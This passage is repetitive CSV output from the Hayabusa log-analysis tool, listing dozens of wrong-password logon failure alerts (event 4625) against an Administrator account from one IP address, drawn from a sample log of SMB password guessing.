NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7avpgQeA0KCIme9Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YFgmt3OEw4cDfPhG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.214 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OqITdE5K63nJg9tg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.306 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zBs4fYCiprxgDd43 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.355 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VtBD0Q2szeURxMYA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.502 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KPUi2NhPP92Rs3hy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.561 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2PrbMf9E0fOuwIB8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.613 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 807zsxQ9WETO9YIp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZGMJKRYUlmijJV40 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.706 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xv33to031A0fQzX2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.753 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IT0bzycur7HXFeLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kyY2K7tT0HgQ1ZL3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6aexuFPH6FyEZ1bN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o8Iojas6sznqlYUE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U2SnliYkmx59ACSM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.971 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2plWY1GZHilHv5Vh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XIfmqihMJdPVz80p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Odg692Eyde8md0t7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gsQNvf5HkRQnbDul | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.134 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: il2DGq3bzfwGuJN4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.183 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9OsQFOcIyougrx0E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gR8wpQrGYzd4NrBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.282 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KFjRsjWXbEPs9m1I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wbjudOy3rWefzAIv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.360 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Q4gc8keCTv2HeE3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.414 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SmsaxHrHYuofUhAH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CvhWasTJYmChfsNU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DszGfEo9aua2y5UC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lZPScjxczbrcJuvJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ucpjxJV4rBXOxy4e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BmTtDfX05VsKFrON | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HhWSUkQhv089RSfJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.729 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i8RXCiXQYgjuPO78 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pfB3u3Np38FOw6hc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I9GcSmto4jdCIw6H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HsogJdHUcldt7JeH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IUbkohKtCy6joOBY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.954 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9ZFyYxBrKnz652Co | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQ2MHr71xALFHJqN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cgjHOgEYRLQiJX75 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QXLjSNCeDAaX4ttQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.137 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: np6hwdqnWLJawVn9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: adqqChrYx3lZ0BAa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1GTXkOnNYTws1MiC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.266 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5QUvFvCM6AJhKjXe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NiVgC8oJ5W2Xr3t0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hXfhdrbLnNOGDqy6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OcjMGbrHQHxIhSSh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LDYPTYHHKAe39GjM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.481 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2PF3H6LE6MqFjVWx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.526 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LLTReOoxRa7UAhT3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jqtqwAPBiBfaHNpv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.619 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jmisFXzDpOILUhIX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.737 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W5UHqVVAYK08FWit | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.785 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PKHLHN59FDnD92Sm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.829 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ohAKPRGvg1JCQ91y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pxdcrng84HEG39nJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.926 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lFGXFxHPbxDTGmiN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tyFnafBgzoLQWTQR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:22.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2IjLjxkd2pX4moFy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:22.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9vqYC4KotCYTcQv5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:22.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qtHcYFIOHglQFb60 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:22.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmiHIQrpsAVRJtdb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:22.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4TdkChjMAviJ6jr8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:22.283 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sPIGU1rBk0F5cG9P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:22.329 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8ScynGWKK3CtoUsi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:22.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0E4JAuxC8MuuGfnw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:22.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4aDJtqsUWKyuDqBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:22.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yCFrEHUgqCtKPybS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:22.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ftrEBfaLGbboV8D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:22.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: thle3slH6gZYllyQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:22.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PcEnabS7oj98WI0e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:22.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EBqGp9CD4A9PsyLk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:22.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iil8dQlzMCkKRNUb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:22.735 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nDBqxF9bmNNjNdsm | IP Addr: 192.168.198.149 | AuthPackage: 